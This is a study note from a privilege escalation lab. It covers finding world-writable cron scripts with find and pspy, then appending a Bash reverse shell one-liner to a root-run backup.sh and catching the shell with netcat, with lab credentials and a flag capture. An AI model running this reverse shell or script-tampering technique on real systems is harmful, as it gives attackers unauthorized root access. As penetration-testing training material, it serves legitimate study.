# Intro - Cron jobs are set to run according to a deterministic frequency but can also be set to run one time, e.g., such as on boot - Cron jobs are typically used for admin tasks such as running backups, cleaning up directories, or the like - `crontab` can be used to create a cron file, which will be run by the cron daemon on the schedule specified - When created, the cron file will be created in `/var/spool/cron` for the specific user that creates it - Each entry in the crontab file requires six items in the following order: minutes, hours, days, months, weeks, commands - For example, the entry `0 */12 * * * /home/admin/backup.sh` would run every 12hrs - The root crontab is almost always only editable by the root user or a user with full sudo privs but can still be abused - For example, during pentesting, you may find a world-writable script that runs as root and, even if you cannot read the crontab to know the exact schedule, you may be able to ascertain how often it runs, e.g., a backup script that creates a `.tar.gz` file every 12 hours) - In this case, you can append a command onto the end of the script (e.g., a revshell one-liner), and it will execute the next time the cron job runs - Certain apps create cron files in the `/etc/cron.d` directory and may be misconfigured to allow a non-root user to edit them # Enum - Use `find` to identify writeable files or dirs ```bash find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null ``` - Peruse the found items such as the directory `/dmz-backups/` - A quick look in the `/dmz-backups` directory shows what appears to be files created every three minutes - This is a major misconfig - Confirm that the cron job is running with `pspy` - `pspy` is a command-line tool used to view running processes without the need for root privileges - It works by scanning [procfs](https://en.wikipedia.org/wiki/Procfs) - We can use it to see commands run by other users, cron jobs, etc. ```bash ./pspy -pf -i 1000 # the -pf flag tells the tool to print commands and file system events # the -i 1000 tells it to scan procfs every 1000ms ``` - From the `pspy` output, we can see that a cron job runs the `backup.sh` script located in the `/dmz-backups` directory and create a tarball file of the contents therein in the `/var/www/html` directory # Insert a revshell - From here, we can look at the `backup.sh` and append a revshell - Note: When editing a script, ALWAYS take a copy of the script and/or create a backup of it - Also note: We should APPEND our commands to the end of the script to still run properly before executing our revshell - Let's look at `bashup.sh` ```bash cat /dmz-backups/backup.sh #!/bin/bash SRCDIR="/var/www/html" DESTDIR="/dmz-backups/" FILENAME=www-backup-$(date +%-Y%-m%-d)-$(date +%-T).tgz tar --absolute-names --create --gzip --file=$DESTDIR$FILENAME $SRCDIR ``` - We can see that the script is just taking in a source and destination directory as variables - It then specifies a file name with the current date and time of backup and creates a tarball of the source directory, the web root directory - Let's modify `backup.sh` as below to add a [Bash one-liner reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) ```bash #!/bin/bash SRCDIR="/var/www/html" DESTDIR="/dmz-backups/" FILENAME=www-backup-$(date +%-Y%-m%-d)-$(date +%-T).tgz tar --absolute-names --create --gzip --file=$DESTDIR$FILENAME $SRCDIR bash -i >& /dev/tcp/<kali_ip>/8443 0>&1 ``` - Now simply open a listener on our Kali box and wait for the cron job to run ```bash sudo nc -lvnp 8443 ``` --- # Exercise ## initial enum - `ping` test ![[images/Pasted image 20260207202140.png]] - `nmap` scans ![[images/Pasted image 20260207202200.png]]![[images/Pasted image 20260207202429.png]] - `ssh` into target with given creds `htb-student:Academy_LLPE!` - light internal enum ![[images/Pasted image 20260207202520.png]] ## cron job enum - identify writeable files and dirs - filter out `/proc`, `/sys`, `/var` dirs - QUESTION: Would it have better better to pipe to `grep` and filter out `proc|sys|var`?? This is because we still see `/proc`, `/sys`, `/var` int he output below ```bash find / -path /proc -prune -o -path /sys -prune -o -path /var -prune -o -type f -perm -o+w 2>/dev/null ``` ![[images/Pasted image 20260207203322.png]] - navigate to `/dmz-backups` - lots of `.tgz` files ![[images/Pasted image 20260207203425.png]] - `cat` the script ![[images/Pasted image 20260207203450.png]] - this script archives all webroot files and stores here, and it appears that a cron job runs this script every 2min - start a listener on port 8443 on Kali box ![[images/Pasted image 20260207203737.png]] - append a revshell to `/dmz-backups/script.sh` ![[images/Pasted image 20260207203831.png]] - then wait...up to 2min for a revshell, else we have a problem - revshell hit our listener! ![[images/Pasted image 20260207204325.png]] - navigate to `/root-/cron_abuse` and `cat` flag ![[images/Pasted image 20260207204412.png]]